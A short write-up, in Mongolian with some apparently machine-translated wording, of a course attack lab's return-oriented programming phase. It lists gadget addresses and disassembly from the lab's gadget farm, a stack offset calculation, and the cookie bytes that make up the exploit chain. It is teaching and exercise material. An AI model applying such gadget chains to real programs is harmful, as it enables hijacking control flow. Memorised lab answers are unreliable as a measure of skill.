0000000000001cee <add_xy>:
    1cee:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
    1cf2:	c3                   	retq   
1.0000000000001d42 <setval_189>:
    1d42:	c7 07 48 89 e0 c1    	movl   $0xc1e08948,(%rdi)
    1d48:	c3                   	retq   
2.0000000000001cb0 <addval_336>:
    1cb0:	8d 87 58 c3 71 94    	lea    -0x6b8e3ca8(%rdi),%eax
    1cb6:	c3                   	retq 
3. офсет // movq %rsp, доод шугамаас %rax-ын 11-р мөр хүртэлх зайны зөрүү 9 мөр * 8 бит = 72 бит == 48 00 00 00 00 00 00 00

4. movl %eax, %ecx // 89 c2 28 d3 c3 (pdf-д үзүүлсэнчлэн 08 d2 ямар ч нөлөө үзүүлэхгүй тул дундуур нь оруулж болно.)
0000000000001d4f <setval_473>:
    1d4f:	c7 07 89 c2 28 db    	movl   $0xdb28c289,(%rdi)
    1d55:	c3                   	retq   
1D51

5. movl %ecx, %edx // 89 d1 90 c1 (90 нь дээрх мөртэй ижил шалтгаан юм.)
0000000000001d01 <setval_197>:
    1d01:	c7 07 89 d1 90 c1    	movl   $0xc190d189,(%rdi)
    1d07:	c3                   	retq   
1b03

6. movl %edx, %esi // 89 ce 94 d2 c3 (08 дб нь дээрх мөртэй ижил байна.)
0000000000001d34 <setval_309>:
    1d34:	c7 07 89 ce 94 d2    	movl   $0xd294ce89,(%rdi)
    1d3a:	c3 
1b36

7. add_xy
0000000000001cee <add_xy>:
    1cee:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
    1cf2:	c3 

8. movq %rax, %rdi 
0000000000001cd3 <setval_203>:
    1cd3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
    1cd9:	c3                   	retq  
1cd5

9. 3-т хүрнэ үү
0d 5c 55 55 55 55 00 00

10 ширхэг жигнэмэг
37 65 31 65 64 39 33 39
5, 6, 7 дугаартай адил гаджетуудын дунд гацсан ч ямар ч нөлөө үзүүлэхгүй зүйлсийг pdf-д үзүүлэв. Та зүгээр л харж, өөрийн фермээс хайх хэрэгтэй.
